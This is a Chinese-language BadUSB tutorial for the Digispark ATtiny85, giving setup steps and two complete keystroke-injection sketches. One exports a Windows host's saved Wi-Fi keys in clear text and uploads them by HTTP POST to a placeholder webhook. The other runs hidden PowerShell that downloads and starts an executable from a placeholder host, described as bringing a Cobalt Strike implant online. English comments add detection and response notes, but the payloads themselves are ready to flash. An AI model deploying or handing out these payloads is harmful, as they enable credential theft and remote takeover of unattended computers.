环境配置

Arduino IDE 1.8.4

开发板管理网址:https://raw.githubusercontent.com/digistump/arduino-boards-index/master/package_digistump_index.json

alt

开发板管理器:Digistump AVR Boards

alt

安装驱动:https://github.com/digistump/digistumparduino/releases

alt

payloads

各种payloads:https://github.com/MTK911/Attiny85

烧录:在 Arduino IDE 中点击“上传”即可,之后根据提示插入 badusb:

alt

窃取wifi密码:

#include "DigiKeyboard.h"

// One-time initialisation: configure the on-board LED pin as an output so
// loop() can switch it on and off.
void setup() {
  const int ledPin = 1;  // LED on Model A
  pinMode(ledPin, OUTPUT);
}

// Arduino main loop: the board presents itself to the host as a USB keyboard
// and types a fixed command script, then blinks the LED on pin 1.
//
// What the typed script does on a Windows host, as shown by the strings below:
//   1. opens the Run dialog and starts cmd, then changes to %temp%;
//   2. runs `netsh wlan export profile key=clear`, which writes the saved
//      WLAN profiles, including their keys in clear text, to XML files;
//   3. collects the 'keyMaterial' lines from WLAN*.xml into a file named
//      Wi-Fi-PASS;
//   4. POSTs that file to the URL placeholder `your-webhook-website`;
//   5. deletes files matching WLAN-* and closes the console.
// The fixed delays are the only synchronisation with the host; the order of
// the statements is the order of the keystrokes.
// Because this is loop(), the whole sequence is typed again after the final
// delays for as long as the device stays plugged in.
//
// Defender notes (detection / response):
//   - Process-creation logs: netsh.exe with `wlan export profile key=clear`,
//     and powershell.exe with `Invoke-WebRequest ... -Method POST -InFile`,
//     both started from an interactively opened cmd.exe.
//   - File artefacts in the user's %TEMP%: the exported profile XML files
//     (until step 5) and Wi-Fi-PASS, which this sketch never deletes.
//   - Device events: a new USB HID keyboard enumerating shortly before the
//     commands appear. USB device-control policy that restricts new HID
//     devices, and locking unattended sessions, address the entry point.
//   - Any Wi-Fi key stored on an affected host should be treated as exposed
//     and rotated.
void loop() {
  DigiKeyboard.update();
  // Empty keystroke before typing. NOTE(review): presumably the usual
  // DigiKeyboard workaround against a dropped first character - confirm.
  DigiKeyboard.sendKeyStroke(0);
  DigiKeyboard.delay(3000); // wait 3 s before typing anything
  DigiKeyboard.sendKeyStroke(KEY_R, MOD_GUI_LEFT); // Win+R: open the Run dialog
  DigiKeyboard.delay(100);
  DigiKeyboard.println("cmd"); // type "cmd" + Enter to start a console
  DigiKeyboard.delay(500);
  DigiKeyboard.println("cd %temp%"); // work inside the user's temporary directory
  DigiKeyboard.delay(300);  
  // Export every saved WLAN profile, keys in clear text, as XML files in the
  // current directory (%temp%).
  DigiKeyboard.println("netsh wlan export profile key=clear");
  DigiKeyboard.delay(2000);  
  // Copy the lines containing 'keyMaterial' from WLAN*.xml into the file
  // Wi-Fi-PASS in the same directory.
  DigiKeyboard.println("powershell Select-String -Path WLAN*.xml -Pattern 'keyMaterial' > Wi-Fi-PASS");
  DigiKeyboard.delay(1000);  
  // Upload Wi-Fi-PASS with an HTTP POST; `your-webhook-website` is a
  // placeholder left by the author, not a real endpoint.
  DigiKeyboard.println("powershell Invoke-WebRequest -Uri your-webhook-website -Method POST -InFile Wi-Fi-PASS");
  DigiKeyboard.delay(2000);  
  // Delete files matching WLAN-* here and in subdirectories (/s), forced (/f)
  // and without prompting (/q). Wi-Fi-PASS is not covered by this pattern.
  DigiKeyboard.println("del WLAN-* /s /f /q");
  DigiKeyboard.delay(1000);  
  DigiKeyboard.println("exit"); // close the console window
  DigiKeyboard.delay(100);  
  digitalWrite(1, HIGH); // LED on: the typed sequence has finished
  DigiKeyboard.delay(10000);
  digitalWrite(1, LOW); 
  DigiKeyboard.delay(5000);
}

Cobalt Strike(cs)上线:

#include "DigiKeyboard.h"

// One-time initialisation: configure the on-board LED pin as an output so
// loop() can switch it on and off.
void setup() {
  const int ledPin = 1;  // LED on Model A
  pinMode(ledPin, OUTPUT);
}

// Arduino main loop: the board presents itself to the host as a USB keyboard
// and types a fixed command script, then blinks the LED on pin 1.
//
// What the typed script does on a Windows host, as shown by the strings below:
//   1. opens the Run dialog and starts cmd, then changes to %temp%;
//   2. types one PowerShell command line (hidden window) that downloads the
//      file at download_url to something.exe and starts it;
//   3. closes the console.
// The fixed delays are the only synchronisation with the host; the order of
// the statements is the order of the keystrokes.
// Because this is loop(), the whole sequence is typed again after the final
// delays for as long as the device stays plugged in.
//
// Defender notes (detection / response):
//   - Process-creation logs: powershell.exe with `-WindowStyle Hidden` whose
//     command line contains both Invoke-WebRequest and Start-Process,
//     started from an interactively opened cmd.exe.
//   - File and network artefacts: a new executable written to the user's
//     %TEMP% and run from there, plus an outbound HTTP request made by
//     powershell.exe.
//   - Controls: application-control rules that block execution from %TEMP%,
//     egress filtering for script hosts, and USB device-control policy that
//     restricts new HID keyboards.
void loop() {
  // Download location typed into the command; "vps" is the author's
  // placeholder host name. The scheme is plain HTTP.
  const char* download_url = "http://vps/artifact2.exe";
  
  DigiKeyboard.update();
  // Empty keystroke before typing. NOTE(review): presumably the usual
  // DigiKeyboard workaround against a dropped first character - confirm.
  DigiKeyboard.sendKeyStroke(0);
  DigiKeyboard.delay(3000); // wait 3 s before typing anything
  DigiKeyboard.sendKeyStroke(KEY_R, MOD_GUI_LEFT); // Win+R: open the Run dialog
  DigiKeyboard.delay(100);
  DigiKeyboard.println("cmd"); // type "cmd" + Enter to start a console
  DigiKeyboard.delay(500);
  DigiKeyboard.println("cd %temp%"); // work inside the user's temporary directory
  DigiKeyboard.delay(300);  
  
  // The next three print() calls type a single command line, with
  // download_url placed between the two literal parts; the empty println()
  // then ends the line so the console runs it.
  DigiKeyboard.print("powershell -WindowStyle Hidden -C \"$u='");
  DigiKeyboard.print(download_url);
  DigiKeyboard.print("';Invoke-WebRequest -Uri $u -OutFile \"something.exe\";Start-Process -FilePath \"something.exe\";\"");
  DigiKeyboard.println("");
  
  DigiKeyboard.println("exit"); // close the console window
  DigiKeyboard.delay(100);  
  digitalWrite(1, HIGH); // LED on: the typed sequence has finished
  DigiKeyboard.delay(10000);
  digitalWrite(1, LOW); 
  DigiKeyboard.delay(5000);
}

参考资料

https://ares-x.com/2018/01/17/%E4%BD%BF%E7%94%A8Digispark%E5%88%B6%E4%BD%9C%E4%B8%80%E4%B8%AA%E7%AE%80%E5%8D%95%E7%9A%84BadUSB/